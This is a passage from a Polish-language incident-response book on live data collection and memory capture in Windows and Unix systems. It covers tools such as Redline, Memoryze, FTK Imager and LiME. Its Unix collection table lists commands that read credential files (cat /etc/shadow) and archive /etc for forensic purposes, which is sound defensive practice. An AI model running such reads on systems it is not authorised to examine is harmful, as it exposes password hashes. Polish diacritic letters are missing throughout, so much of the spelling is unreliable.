mielimy okazj rozwizywa spraw incydentu, w ktr zamieszany by urzdnik finansowy
z powszechnie znanej federalnej agencji USA. Zastosowalimy analiz na ywo, nastpnie
wyczylimy system i wykonalimy obraz dysku twardego. Podczas badania jego zawartoci
odkrylimy program rejestrujcy naciskane klawisze. Program ten regularnie wysya
przechwycone dane do zewntrznej strony internetowej. Jako e podczas naszej analizy na
ywo system nie mia dostpu do internetu, znalelimy w nim te zapis wykonywanych przez
nas czynnoci. Trzeba przyzna, e zobaczenie zapisu wasnych poczyna na komputerze
to bardzo ciekawe dowiadczenie. Mora z tej historii jest taki, e jeli kto rcznie pracuje
w systemie, to nie moe mie pewnoci, e kto inny go nie podglda fizycznie lub
wirtualnie. A jeli kto to robi, moe dowiedzie si duo o nas oraz naszych metodach
i wykorzysta to przeciwko nam. Nie sugerujemy, e trzeba by absolutnym paranoikiem,
ale jak to jeden z naszych kolegw powiedzia: Najlepsze, co mona zrobi, to nie by gupim.
GROMADZENIE DANYCH NA YWO

W SYSTEMACH MICROSOFT WINDOWS
W systemach Windows do wyboru s trzy moliwoci zbierania danych na ywo: mona
skorzysta z gotowego zestawu narzdzi, zbudowa wasny oraz zastosowa rozwizanie
hybrydowe. Zalecamy uycie gotowego zestawu, poniewa organizacje tworzce takie narzdzia
z reguy maj wicej czasu ni my na ich dopracowanie, aby speniay wszelkie wymagania.
Jeli jednak programy te nie odpowiadaj Twoim potrzebom lub s dla Ciebie za drogie albo po
prostu masz ochot si zabawi, oczywicie moesz te zbudowa co swojego. Cho utworzenie
wasnego zestawu narzdzi do zbierania danych z dziaajcego systemu to z pewnoci pouczajce
dowiadczenie, a przy okazji do zabawne, to jednak gdy zacznie Ci brakowa czasu, narzdzia
zostan zaniedbane. Dlatego lepszym wyjciem od tworzenia wszystkiego od zera moe by
zastosowanie rozwizania hybrydowego. Ponadto podczas pracy nad wasnymi narzdziami
naley pamita o kryteriach wyboru takich narzdzi, aby nie utworzy czego, co nie zostanie
zaakceptowane przez innych jako zestaw narzdzi do zbierania danych na ywo.
Gotowe zestawy narzdzi

Podczas szukania materiaw do tej ksiki stwierdzilimy, e jest bardzo mao dobrych narzdzi
do analizy systemw na ywo. Gdybymy rzdzili wiatem, nakazalibymy spoecznoci specjalistw
od bezpieczestwa komputerowego stworzenie lepszych narzdzi. Przebadalimy kilkanacie
rozwiza i znalelimy tylko jedno komercyjne (ale darmowe) narzdzie, ktre speniao nasze
wymagania: Redline firmy Mandiant. Jest to jedyne narzdzie zbierajce wikszo wymaganych
informacji i pozwalajce postpowa zgodnie z najlepszymi praktykami opisanymi wczeniej
w tym rozdziale.
Pewnie zastanawiasz si, dlaczego nie polecamy adnego z otwartych rozwiza. Nie mamy
nic przeciwko takim programom ani metodom i wiemy, e niektre otwarte rozwizania znacznie
przewyszaj jakoci komercyjn konkurencj w pewnych obszarach. Jednak w tym przypadku
nie udao nam si znale ani jednego zestawu narzdzi o otwartym kodzie rdowym, ktry
speniaby nasze wymagania. aden z przebadanych przez nas programw nie spenia kryteriw
opisanych w tej ksice. Wiele z nich byo bardzo przestarzaych lub wymagao duo pracy,
aby przystosowa je do dziaania.
Redline firmy Mandiant

Program Redline firmy Mandiant to narzdzie z graficznym interfejsem uytkownika umoliwiajce
zarwno zbieranie, jak i analizowanie danych z dziaajcego systemu. Program ten tworzy tzw.
kolektor (ang. collector), czyli zbir skryptw wsadowych wiersza polece i plikw binarnych,
ktre mona zapisa na przenonym noniku danych i uruchomi w dowolnym systemie w celu
pobrania danych. Nastpnie dane te analizuje si we wasnym systemie przy uyciu wygodnego
graficznego interfejsu uytkownika. Analiz rwnie mona wykona za pomoc programu
Redline, ale do tematu tego wrcimy w rozdziale 12.
W INTERNECIE
www.mandiant.com/resources/download/redline
Z informacji zamieszczonych na stronie firmy Mandiant mona dowiedzie si, e program

Redline jest oficjalnie dostpny dla systemw Windows XP, Windows Vista i Windows 7
(w wersjach 32- i 64-bitowych). Ponadto stwierdzilimy, e rwnie dobrze dziaa te w systemach
Server 2003 i 2008. Kompletny kolektor jest do obszerny program Redline zbiera informacje
z 25 kategorii, m.in. wszystkie typowe dane do analizy na ywo opisane wczeniej w tym rozdziale.
Zgromadzone informacje mog by bardzo pomocne w ledztwie, cho mog te pocztkowo
przytacza swoj objtoci. Jeli trzeba, zawsze mona zmieni ustawienia, aby zbiera troch
mniej informacji lub skrci czas ich pobierania.
Ostrzeenie Nie instaluj pakietu MSI Redline w systemie, ktry chcesz zbada! Program ten naley zainstalowa
w swoim komputerze uywanym do pracy lub innym systemie niedotknitym incydentem.
Nastpnie w komputerze tym tworzy si kolektor Redline. W podejrzanym systemie wykonuje
si tylko samodzielny skrypt wsadowy kolektora, ktry automatycznie zapisuje dane w tym
samym miejscu, w ktrym si znajduje.
Program Redline po zainstalowaniu w systemie mona uruchomi za pomoc opcji z menu

startowego. Na ekranie gwnym programu znajduj si dwie kategorie czynnoci do wykonania,
co pokazano na rysunku 7.1.
Kliknij opcj Create a Comprehensive Collector (utwrz kompletny kolektor). Nastpnie przejd
do folderu, w ktrym chcesz go zapisa, co pokazano na rysunku 7.2. Zalecamy zapisywanie
kolektora na noniku wymiennym, np. w pamici USB.
Przed zapisaniem kolektora mona przejrze i dostosowa jego parametry. W tym celu naley
klikn odnonik Edit your script (edytuj skrypt). Domylne ustawienia trybu penego pozwalaj
na zbieranie duych iloci danych, ktre w niektrych przypadkach mog by niepotrzebne.
Przykadowo czasami kontrolery domeny Windows zawieraj bardzo due dzienniki zdarze,
ktre sprawiaj problemy i opniaj zbieranie danych. Jeli nie s potrzebne, mona usun
zaznaczenie opcji Event Logs (dzienniki zdarze) na karcie System.
Zapisany kolektor mona bardzo atwo uruchomi. Wystarczy go znale w katalogu i dwukrotnie
klikn plik o nazwie RunRedlineAudit.bat. Jeli do dziaania skryptu potrzebne s uprawnienia
administratora, system wywietli prob o ich przydzielenie. Pniej zostanie otwarte okno DOS
i zacznie si gromadzenie danych. W trakcie tego procesu bdzie wywietlanych wiele wiadomoci
i ostrzee. To normalne. Zamknicie okna oznacza koniec zbierania danych.
Wad programu Redline jest to, e nie zapisuje wykonanych przez siebie czynnoci i nie oblicza
sum kontrolnych MD5 dla tworzonych danych. Cho specjalista mgby napisa dodatkowy skrypt
uruchamiajcy kolektor i rejestrujcy te informacje, to jednak wolelibymy, aby funkcja ta bya
wbudowana bezporednio w narzdzie.
RYSUNEK 7.1. Ekran gwny programu Redline
RYSUNEK 7.2. Sesja analizy programu Redline Mandiant

Narzdzia wasnej roboty

Podczas szukania gotowych zestaww narzdzi do analizy systemw na ywo natknlimy si na
rnych blogach, forach, listach mailingowych i innych miejscach na ludzi, ktrzy take szukali
czego podobnego. Czsto podpowiadano im, aby utworzyli wasne narzdzia od podstaw. Wiele
organizacji rzeczywicie postpuje w ten sposb (sami dopiero niedawno zarzucilimy wasny
zestaw narzdzi dla systemu Microsoft Windows). Dlatego w tym miejscu przedstawiamy kilka
porad dotyczcych utrzymywania wasnego zestawu narzdzi oraz podpowiadamy, jak utworzy
wasny szkielet i jakie narzdzia mogyby si w nim znale.
Pierwsz decyzj, jak naley podj, jest wybr wersji systemw operacyjnych, ktre bd obsugiwane.
Niektre narzdzia dziaaj tylko w wybranych systemach, poniewa wystpuj rnice w poleceniach
wiersza polece i lokalizacjach plikw oraz katalogw. Pamitaj, e wikszo systemw operacyjnych
Microsoft Windows wystpuje w wersjach 32- i 64-bitowej oraz niektre narzdzia, polecenia i lokalizacje
plikw s w nich rne. Warto wic utworzy systemy testowe dla kadego systemu operacyjnego, ktry
ma by obsugiwany powinny to by fizyczne maszyny, jeli ma si kilka w zapasie, lub maszyny
wirtualne w innym przypadku. Zalecamy skoncentrowanie si na tych systemach operacyjnych, ktrych
masz najwicej w swoim rodowisku, poniewa kady kolejny oznacza dodatkow prac zarwno
jednorazow, jak i regularn. Nie tylko trzeba dowiedzie si, jak zbiera dane z kadego takiego
systemu, ale dodatkowo po kadej aktualizacji zestawu narzdzi naley przeprowadzi kompletne
testy w kadym systemie operacyjnym, aby upewni si, e wszystko dziaa, jak naley. Ponadto
warto utrzymywa stay kontakt z dziaem IT, aby by na bieco z najwieszymi informacjami.
Po wybraniu systemw operacyjnych do obsugi musisz znale narzdzia do zbierania potrzebnych
informacji. Niektre mog by wbudowane w system, a inne mog pochodzi z zewntrz i by darmowe
lub patne. Ponisze tabele zawieraj zestawienie wszystkich przedstawionych do tej pory informacji
oraz niektrych akceptowalnych dostpnych aktualnie opcji. Nie podajemy odnonikw do niektrych
narzdzi, bo bardzo czsto si zmieniaj. Najlepiej poszuka ich za pomoc wyszukiwarki internetowej
s bardzo popularne, wic atwo je znale.
Pierwsza tabela zawiera list wbudowanych polece systemu Windows, za pomoc ktrych
mona zbiera informacje z kilku wanych obszarw, takich jak poczenia sieciowe, informacje
o systemie czy data i godzina systemowa. Budujc swj zestaw, skopiuj odpowiednie pliki z czystego
systemu Windows. Ponadto dodaj konsol (cmd.exe) z czystego systemu. Nazywa si to budowaniem
zestawu przy uyciu zaufanych plikw binarnych.
Zbierane dane Polecenia

Data i godzina systemowa date i time
Strefa czasowa systeminfo
Zainstalowane programy
Oglne informacje o systemie
Wersja systemu operacyjnego
Czas pracy
Informacje o systemie plikw
Zbierane dane Polecenia

Konta uytkownikw net user
Grupy net group
Interfejsy sieciowe ipconfig /all
Tabela tras route print
Tabela ARP arp -a
Bufor DNS ipconfig /displaydns
Poczenia sieciowe netstat -abn
Nastpna tabela zawiera list kilku darmowych narzdzi dostarczajcych informacji, ktrych
nie da si atwo wydoby z systemu Windows za pomoc polece standardowych, takich jak np.
magazyny danych, zaadowane sterowniki czy kompletna lista zawartoci systemu plikw.
Rodzaj zbieranych informacji Nazwa narzdzia

Poczenia sieciowe DiamondCS openports (www.softpedia.com)
Lista usug i zada Microsoft autoruns
Zaadowane sterowniki NirSoft DriverView
Otwarte pliki i uchwyty NirSoft OpenedFilesView
Dziaajce procesy Microsoft pslist
Rejestr (dane konfiguracyjne) Microsoft logparser
Dzienniki zdarze (historia logowania) Microsoft logparser
Lista zawartoci systemu plikw Microsoft logparser
Obliczanie sumy kontrolnej dla danych PC-Tools.net md5sums lub hashutils
uzyskanych w procesie analizy na ywo (code.kliu.org/misc/hashutils)
Wymienione obszary s naszym zdaniem najbardziej przydatnymi rdami informacji.

Oczywicie jest jeszcze wiele innych danych, ktre mona by pobra, np. informacje o zasobach
pobieranych z wyprzedzeniem, informacje o systemowych punktach przywracania, historia
przegldarki itd. Naley tak wybra zostaw informacji do pobierania, aby znale zoty rodek
midzy szybkoci otrzymywania odpowiedzi na pytania i wpywem na system.
Niektre zewntrzne narzdzia maj graficzny interfejs uytkownika, ktry w zestawach
do zbierania danych na ywo nie jest podany. Z jednej strony interfejs taki powiksza aplikacj
(i powoduje wytworzenie wikszej iloci artefaktw), a z drugiej jest trudniejszy w uyciu
w automatyczny sposb. Na szczcie wikszo wymienionych przez nas narzdzi zawiera opcj
wiersza polece pozwalajc wyczy graficzny interfejs uytkownika i skierowa wyniki
do zwykego pliku tekstowego. Przykadowo program OpenedFilesView firmy NirSoft mona

uruchomi przy uyciu opcji /stext. Opcje wiersza polece czasami si zmieniaj, wic podczas
budowy wasnego zestawu narzdzi naley sprawdzi, jak aktualnie wygldaj, i odpowiednio je
dostosowa. Ponadto zmienilimy nazwy uytych narzdzi, dodajc przedrostek t_, aby wiedzie,
ktre artefakty s ladami po naszych narzdziach, a ktre nie. Ewentualnie mona te uy
zaufanej kopii wiersza polece i polece systemu operacyjnego w ramach zestawu do zbierania
informacji na ywo dla kadego z obsugiwanych systemw operacyjnych.
W kocu naley wybra jzyk skryptowy do automatyzacji procesu. Jest wiele moliwoci
do wyboru, np. skrypty wsadowe MS-DOS, VBScript, Perl, Python itd. Jako e nam zaley na jak
najmniejszym zuyciu zasobw, wybralimy skrypt wsadowy DOS. Inne rozwizania mog by
atwiejsze do wdroenia lub zapewnia wiksze moliwoci, ale skrypt wsadowy DOS ma wszystko,
czego nam trzeba. Ponadto skrypt taki nie jest zaleny od adnych zewntrznych skadnikw
mona go uruchomi w kadym systemie Windows. Do skryptu naley doda kod rejestrujcy
odpowiedni ilo informacji o jego aktywnoci i obliczajcy sum kontroln dla zebranych
danych. Uwaaj te na nazwy plikw i katalogw zwaszcza te dugie i zawierajce spacje
lub znaki specjalne. Czasami do ich obsugi potrzebne s specjalne mechanizmy.
Zanim sprawdzisz swj nowy, lnicy zestaw narzdzi w akcji, powiniene go dokadnie
przetestowa. Zbuduj rodowisko testowe z wirtualnych lub fizycznych maszyn. Powinno ono
jak najbliej przypomina Twoje rodowisko produkcyjne pod wzgldem systemw operacyjnych,
aplikacji i ustawie konfiguracyjnych. Kilka razy przeprowad zbieranie danych i upewnij si,
e wszystko zadziaao zgodnie z oczekiwaniami. Wybierz losowo kilka systemw operacyjnych
w swoim rodowisku i wykonaj w nich proces zbierania danych w odpowiednim czasie. Naley
nie tylko sprawdzi dokadno zgromadzonych danych, ale rwnie bacznie przyglda si
caemu procesowi, aby wykry ewentualne bdy lub inne nieoczekiwane zdarzenia.
Zbieranie informacji z pamici

Kiedy zbieranie pamici w systemach Microsoft Windows byo bardzo trudne, ale powstay ju
narzdzia, ktre znacznie to uatwiy. Udao nam si znale przynajmniej sze dobrych darmowych
programw. Cztery z nich umoliwiaj wykonanie zrzutu caej zawartoci pamici. Trzy mog
pobra pami dla wybranego procesu, co jest bardzo przydatne.
Kompletny zrzut pamici

Kolejna tabela zawiera list znanych narzdzi sucych do wykonywania kompletnych
zrzutw pamici. Warto zna kilka z nich. Wszystkie, oprcz Mantech MDD, dziaaj
w nowych wersjach systemu Microsoft Windows, czyli Windows XP, Vista, 7 i Server 2003.
Windows Vista i 7 wymagaj podpisanych sterownikw, a sterownik pamici dla Mantech MDD
w wersji 1.3 by niepodpisany.
Narzdzie Strona internetowa

AccessData FTK Imager Lite www.accessdata.com/support/product-downloads
Mantech MDD sourceforge.net/projects/mdd
Mandiant Memoryze www.mandiant.com/resources/download/memoryze
Moonsols Windows Memory Toolkit www.moonsols.com/windows-memory-toolkit
Poniej opisujemy dwa narzdzia, ktrych sami najczciej uywamy do tworzenia obrazw
pamici w systemach Windows Memoryze firmy Mandiant i FTK Imager Lite firmy AccessData.
Mandiant Memoryze
Do tworzenia kompletnych zrzutw pamici najczciej uywamy programu Memoryze firmy
Mandiant, ktry jest dostpny w postaci pakietu MSI. Program ten mona stosowa na dwa
sposoby i w obu przypadkach naley uywa bezpiecznego komputera, tzn. wolnego od wirusw,
zamanych zabezpiecze i wykorzystywanego do rutynowych dziaa ledczych.
Ostrzeenie Nie wykonuj tych czynnoci na komputerze bdcym dowodem w ledztwie! Inaczej mwic,
nie pobieraj i nie instaluj programu Memoryze, ani adnego innego, w systemie, ktry jest
poddawany ledztwu. Moe si zdarzy, e nie bdzie innego wyjcia, ale generalnie to bardzo
zy pomys, poniewa w ten sposb powoduje si wiele niepotrzebnych zmian i mona
doprowadzi do zniszczenia dowodw lub zanieczyszczenia badanego systemu.
Pierwsza opcja polega na instalacji programu w bezpiecznym komputerze i skopiowaniu

plikw z katalogu instalacyjnego na przenony nonik danych. Program Memoryze jest
instalowany w katalogu Program Files\Mandiant\Memoryze lub Program Files (x86)\
Mandiant\Memoryze (w systemach 64-bitowych). Po skopiowaniu wszystkich plikw z tego
folderu do folderu na noniku wymiennym moesz od razu przystpi do wykonywania
zrzutu pamici wybranego systemu.
Druga opcja polega na uruchomieniu wiersza polece systemu Windows, przejciu
do katalogu zawierajcego pakiet MSI programu i wykonaniu polecenia msiexec /a
MemoryzeSetup.msi /qb TARGETDIR=<litera_nonika_wymiennego_i_folder>.
Czon <litera_nonika_wymiennego_i_folder> naley zastpi liter dysku i ciek do
folderu na noniku USB lub innym, na ktrym ma zosta zainstalowany program Memoryze.
Nastpnie podcz nonik z programem do podejrzanego systemu, przejd do folderu
zawierajcego Memoryze i uruchom plik MemoryDD.bat. Pamitaj, e w systemach z kontrol
konta uytkownika (UAC) moe by konieczne uruchomienie specjalnego wiersza polece lub
zalogowanie si jako inny uytkownik. Jeeli wyniki chcesz zapisa w miejscu innym ni biecy
katalog, uyj opcji wiersza polece -output. Po uruchomieniu pliku wsadowego pojawi si nowe
okno z zawartoci podobn do tej:
<snip>
Beginning local audit.
Audit started 05-08-2012 20:21:23
Checking if 'D:\Downloads\LR\Memoryze\Audits\JASON-PC\2012050900
2123' exists...
Saving batch result to 'D:\Downloads\LR\Memoryze\Audits\JASON-PC\20120509002123\'.
Batch results written to
'D:\Downloads\LR\Memoryze\Audits\JASON-PC\20120509002123\'.
Auditing (w32memory-acquisition) started 05-08-2012 20:21:23
Executing command for internal module w32memory-acquisition, 1.3.22.2
<Issue number="0" level="Info" summary="System range 0x0000000000000000 -
0x000000000009d000" context="EnumerateDevices"/>
<Issue number="7022" level="Warning" summary=

"Unable to read memory page(s)Invalid address range 0x00000000bf780000 -
0x00000000fffff000" context="MapPhysicalMemory"/>
Uwaga Niektre komunikaty z powyszego listingu mog Ci niepokoi. Jednak ostrzeenia (ang. warning)
s normalne. Martwi si naley, gdy zaczn by zgaszane bdy (ang. error).
Zakoczenie zbierania danych sygnalizuje zamknicie okna wiersza polece. Zanim uznasz,
e operacja si powioda, porwnaj rozmiar pliku wyjciowego z oczekiwan wielkoci pamici.
Program Memoryze i inne tego typu narzdzia miewaj problemy z niektrymi systemami. Jeeli
wic nie moesz zmusi tego narzdzia do utworzenia pliku o spodziewanym rozmiarze, sprbuj
uy innego programu. Pamitaj, e Memoryze dodaje te przestrze adresow procesw podlegajc
wymianie (w pamici wirtualnej), wic otrzymany obraz pamici moe by wikszy ni rozmiar
pamici fizycznej.
AccessData FTK Imager Lite

Drugie najczciej uywane przez nas narzdzie do tworzenia obrazw pamici w systemie Windows
to FTK Imager Lite firmy AccessData. Jest to program z graficznym interfejsem uytkownika
sucy do tworzenia obrazw zarwno dyskw twardych, jak i pamici. Czon Lite w nazwie
oznacza, e aplikacja nie wymaga instalacji i mona j uruchomi bezporednio w folderze. Jest to
idealne rozwizanie dla specjalisty od incydentw bezpieczestwa, poniewa nie zmusza go do
kopiowania adnych plikw do badanego systemu. Najatwiej pobra program FTK Imager Lite
w formie pakietu ZIP ze strony internetowej i rozpakowa go na noniku wymiennym typu USB.
Pniej nonik ten mona podczy do systemu, ktry ma zosta zbadany, i za pomoc Eksploratora
Windows znale na nim plik FTK Imager.exe, ktry naley dwukrotnie klikn. Na rysunku 7.3
pokazano gwne okno tego programu.
RYSUNEK 7.3. Gwne okno programu FTK Imager Lite
W menu File (plik) znajduje si opcja Capture Memory (wykonaj zrzut pamici). Kliknicie jej
powoduje pojawienie si okna, w ktrym mona wybra miejsce zapisu i poda nazw obrazu. Jak
zwykle przy pracy w dziaajcym systemie, zalecamy zapisanie obrazu na noniku zewntrznym lub
dysku sieciowym. Jeli do uruchomienia programu FTK Imager uyto nonika USB, zrzut rwnie
mona zapisa na tym noniku. Plikowi trzeba nada odpowiedni nazw, np. zawierajc numer
sprawy i metki dowodu albo nazw sprawy i komputera. Nazwa nie moe si dublowa czasami
trzeba pracowa w jednym systemie kilka razy. Po rozpoczciu procesu wykonywania zrzutu
pojawi si okno dialogowe podobne do pokazanego na nastpnej stronie.
Po zakoczeniu procesu FTK Imager wywietli informacj, e wykonywanie zrzutu pamici

zakoczyo si powodzeniem (Memory capture finished successfully).
Czasami potrzebna jest tylko pami dotyczca wybranego procesu, wic w nastpnym
podpunkcie pokazujemy, jak wykona zrzut pamici dla jednego procesu w systemie Windows.
Wykonywanie zrzutu pamici dla jednego procesu

Czasami potrzebny jest tylko zrzut przestrzeni pamiciowej zajmowanej przez jeden proces. Przykadowo
wiadomo, e w systemie dziaa konkretny wirus i potrzebny jest zrzut pamici tylko tego jednego procesu
albo jaki proces systemowy zawiera lady niedawnej szkodliwej dziaalnoci. W poniszej tabeli
przedstawiamy list niektrych narzdzi uywanych przez nas do wykonywania tego rodzaju zrzutw.
Narzdzie Strona internetowa

Mandiant Memoryze www.mandiant.com/resources/download/memoryze
Microsoft userdump www.microsoft.com/en-us/download/details.aspx?id=4060
Microsoft procdump technet.microsoft.com/en-us/sysinternals/dd996900.aspx
Ntsecurity.nupmdump ntsecurity.nu/toolbox/pmdump
Najczciej korzystamy z programu Mandiant Memoryze. W katalogu utworzonym wczeniej

znajduje si te plik o nazwie ProcessDD.bat. Aby wykona zrzut pamici wybranego procesu,
uruchom ten plik i podaj identyfikator tego procesu za pomoc opcji wiersza polece -pid.
Program Memoryze zrzuci zawarto tego procesu do pliku wraz ze zbuforowan zawartoci
wszystkich plikw, ktre w procesie byy otwarte podczas operacji.
ZBIERANIE DANYCH NA YWO

W SYSTEMACH UNIKSOWYCH
Nie ma zbyt wielu dobrze zadbanych, gotowych i publicznie dostpnych narzdzi do analizy
dziaajcych systemw uniksowych. Najlepszym zestawem narzdzi typu open source, jaki
znalelimy, jest LINReS firmy Network Intelligence India.
W INTERNECIE
Strona twrcy programu LINReS www.niiconsulting.com/innovation/linres.html
Strona, z ktrej mona pobra program LINReS sourceforge.net/projects/linres
Zestaw ten jest przeznaczony gwnie do uytku w systemie Red Hat Linux, ale mona go
wykorzysta jako wzr do budowy zestaww narzdzi dla innych wersji systemu Red Hat, a nawet
innych rodzajw systemw uniksowych, np. FreeBDS, Solaris czy OS X. Szkielet LINReS nie jest
bardzo skomplikowany, cho moesz by zmuszony do podszlifowania swoich umiejtnoci
z zakresu pisania skryptw BASH, aby wykorzysta w peni jego moliwoci.
Ze wzgldu na ma dostpno aktualnych narzdzi do zbierania danych na ywo z systemw
uniksowych praca w tych systemach wci w gwnej mierze polega na opracowywaniu wasnych
rozwiza. Procedura tworzenia zestawu narzdzi do analizy na ywo dla takich systemw jest
podobna do procedury dla systemw Windows naley wybra systemy operacyjne, ktre chce
si obsugiwa, znale zewntrzne narzdzia, jakie mog by potrzebne, wybra jzyk skryptowy
do poczenia wszystkiego i przeprowadzi dokadne testy. W nastpnym punkcie podajemy
podstawowe wiadomoci na ten temat.
Zestawy narzdzi do analizy na ywo

Podobnie jak w systemie Windows, najpierw naley wybra wersje systemw operacyjnych, ktre
maj by obsugiwane. Systemy uniksowe s bardzo zrnicowane i to zarwno midzy dystrybucjami,
jak i w ich obrbie. Z perspektywy uytkownika niektre dystrybucje zmieniaj si nieznacznie,
a inne podlegaj powanym modyfikacjom co kilka miesicy. Dlatego kady wybrany system naley
ledzi pod ktem nowych wersji. Ponadto naley wzi pod uwag wersje 32- i 64-bitow kadego
systemu. Podobnie jak w przypadku wersji systemu Windows, uwag naley skupi na najczciej
uywanych uniksowych systemach operacyjnych. Kada kolejna wersja oznacza dodatkow prac.
Uwaga Jako konsultanci ds. bezpieczestwa komputerowego pracowalimy przy wielu incydentach w rnych
wersjach systemw uniksowych. Utworzenie nowego zestawu narzdzi dla jednego z tych systemw
wymaga tak duo czasu i wysiku, e postanowilimy opracowa narzdzia do budowania nowych
zestaww do analizy na ywo. Narzdzia te zawieraj skrypty powoki Bournea, ktre przechodz
przez proces reakcji na ywo oraz identyfikuj odpowiednie pliki binarne i wszystkie powizane
z nimi biblioteki. Nie przedstawiamy tutaj tych skryptw, poniewa wymagaj cigego modyfikowania.
Stanowi jednak doskona ilustracj tego, ile pracy trzeba woy w zbudowanie i utrzymanie zestawu
narzdzi do analizy na ywo dla systemw uniksowych.
Nastpn decyzj, jak naley podj, jest wybr jzyka do napisania skryptw. Zasady wyboru
s takie same jak w systemie Windows. W uniksowych systemach operacyjnych do wyboru jest
wiele jzykw Perl, Python, powoka Bournea, BASH itd. W naszej firmie postanowilimy
wykorzysta nowsze i te niezawodne rozwizanie powok Bourne-again Shell (BASH).
Cenne wskazwki mona te znale na kilku stronach internetowych. Jedn z nich jest The Apple
Examiner, zawierajca wiele przydatnych informacji dotyczcych systemu OS X. Jako e jest to system
uniksowy, w portalu tym mona te znale opisy technik analiz na ywo oglnie w systemach uniksowych.
Skadajc swj wasny zestaw, pamitaj, e polecenie system_profiler w systemie Apple OS X zwraca
bardzo duo przydatnych informacji o systemie i podczonych do niego urzdzeniach.
W INTERNECIE
Portal The Apple Examiner www.appleexaminer.com
Podpowiedzi, jakie informacje mona zbiera w systemie Apple OS X
www.appleexaminer.com/MacsAndOS/Analysis/InitialDataGathering/InitialDataGathering.html
Ponisza tabela zawiera list podstawowych kategorii danych, jakie warto zbiera w systemach
uniksowych, oraz sugerowane narzdzia i polecenia do ich zbierania. S to tylko oglne wskazwki
i oczywicie nie dotycz wszystkich istniejcych odmian systemu, ale mog posuy jako podstawowy
poradnik przy tworzeniu wasnego uniksowego zestawu narzdzi do analizy na ywo.
Rodzaj danych Narzdzie Licencja

Systemowa data Polecenie date Skadnik systemu operacyjnego
i godzina
Zainstalowane Debian: polecenie dpkg --getselections
programy RPM: polecenie rpm -qa
BSD: polecenie pkg_info
OS X: skopiowa plik
/Library/Receipts/InstallHistory.plist
Informacje Polecenia mount, df oraz fdisk -l Skadnik systemu operacyjnego
o systemie plikw
Wersja systemu Polecenie cat /etc/issue (zmienia si Skadnik systemu operacyjnego
operacyjnego w rnych systemach operacyjnych)
Wersja jdra Polecenie uname -a Skadnik systemu operacyjnego
Czas dziaania Polecenie w Skadnik systemu operacyjnego
Cron Utworzy archiwum tar z plikw crona, Skadnik systemu operacyjnego
ktre s z reguy przechowywane
w katalogu /var/spool/cron
Usugi Zaley od systemu Skadnik systemu operacyjnego
Konta Polecenia cat /etc/password Skadnik systemu operacyjnego
uytkownikw i cat /etc/shadow
Grupy Polecenie cat /etc/group Skadnik systemu operacyjnego
Rodzaj danych Narzdzie Licencja

Interfejsy sieciowe Polecenie ifconfig -a Skadnik systemu operacyjnego
Tabela tras Polecenie netstat -rn Skadnik systemu operacyjnego
Tabela ARP Polecenie arp -a Skadnik systemu operacyjnego
Poczenia sieciowe Polecenie netstat -anp Skadnik systemu operacyjnego
Zaadowane Linux: polecenie lsmod Skadnik systemu operacyjnego
sterowniki BSD: polecenie kldstat
OS X: polecenie kextstat
(zalene od systemu operacyjnego)
Otwarte pliki Polecenie lsof Darmowe, powszechnie
i uchwyty instalowane
Dziaajce procesy Linux: polecenie ps auxwwwem Skadnik systemu operacyjnego
i wtki (w innych systemach moe by inne)
Dane Utworzy archiwum tar z katalogu Skadnik systemu operacyjnego
konfiguracyjne /etc (np. tar cvfz /cieka/do/
(kopia plikw) nonika/hosta.itd.tar.gz /etc/)
Dzienniki systemowe Z reguy zapisane w katalogu /var/log Skadnik systemu operacyjnego
(kopia plikw) lub /var/adm albo /Private/var/log
(OS X), ale niewykluczone s te inne
lokalizacje
Historia powoki BASH: .bash_history Skadnik systemu operacyjnego
uytkownika SH: .history
(zaley od powoki)
Lista zawartoci Polecenie find / -xdev -printf Skadnik systemu operacyjnego
systemu plikw "%m;%Ax;%AT;%Tx;%TT;%Cx;%CT;%U;%G;
%s;%p\n" lub jeli narzdzie find jest
niezainstalowane:
Polecenie ls -alRu / (atime)
Polecenie ls -alRc / (ctime)
Polecenie ls -alR / (mtime)
Obliczanie sumy Polecenie md5 lub md5sum Z reguy skadnik systemu
kontrolnej dla operacyjnego
danych uzyskanych
w procesie analizy
na ywo
Dla kadej obsugiwanej wersji systemu uniksowego naley przeprowadzi dokadne testy, aby
sprawdzi, czy wszystko dziaa tak, jak powinno. Zalecamy wykonywanie testw po ukazaniu si
kadej, nawet drobnej aktualizacji dystrybucji danego systemu operacyjnego.
Wykonywanie zrzutw pamici

Kada wersja Uniksa i BSD inaczej obsuguje urzdzenia pamiciowe. Take w Linuksie i innych
odmianach Uniksa zmieniono nieco model zabezpiecze, aby uniemoliwi normalny dostp
do pamici. Dalej opisujemy techniki wykonywania zrzutw pamici w rnych systemach. Jeli
trafisz na jaki nietypowy system operacyjny (np. IRIX albo Solaris), poszukaj cieki do wza
urzdzenia pamiciowego i sprbuj uy polecenia dd. Jak wyjaniamy w rozdziale powiconym
tematowi analizy, z reguy najwicej trudnoci sprawia analizowanie obrazw pamici z systemw
Unix i BSD.
Pobieranie danych z jdra Linux

W starszych wersjach Linuksa mona byo za pomoc zwykego narzdzia do wykonywania obrazw
dysku, np. dd albo DCFLdd, wykona zrzut zawartoci pamici przez urzdzenie /dev/mem. Jednak
w nowszych wersjach jdra Linuksa udoskonalono zabezpieczenia tak, e uniemoliwiono bezporedni
dostp do urzdze pamiciowych nawet uytkownikowi root. Do pamici mona dosta si tylko
za pomoc specjalnej techniki. Najczciej stosowanym rozwizaniem jest wykorzystanie adowalnego
moduu jdra (ang. loadable kernel module LKM). Najlepszym darmowym rozwizaniem,
jakie udao nam si znale, jest narzdzie o otwartym kodzie rdowym zwane Linux Memory
Extractor (LiME). Za jego pomoc mona wykonywa zrzuty pamici w systemach linuksowych
oraz zapisywa je w lokalnym pliku lub zdalnej lokalizacji przy uyciu poczenia TCP.
W INTERNECIE
Strona internetowa narzdzia Linux Memory Extractor code.google.com/p/lime-forensics
Najwicej trudnoci z narzdziem LiME sprawia to, e jest ono adowalnym moduem jdra,
wic musi zosta skompilowane dla dokadnie tej wersji jdra, ktra jest uywana w systemie
docelowym. Ponadto w wersji 1.1 (r14.) pliku lime.c nie byo moliwoci dodania mechanizmu
generowania kryptograficznych sum kontrolnych z wynikw. Dlatego naleao je oblicza
i zapisywa samodzielnie. Przetestowalimy program LiME na kilku popularnych dystrybucjach
Linuksa, Ubuntu, CentOS, Debian i OpenSuSE. W testach tych uylimy wersji jdra 2.6.18, 2.6.32
oraz 3.1.10 (zarwno 32- jak i 64-bitowych). We wszystkich przypadkach narzdzie skompilowao
si i dziaao bez adnych problemw. Ponadto na stronie internetowej programu mona znale
dokumentacj do niego w formacie PDF.
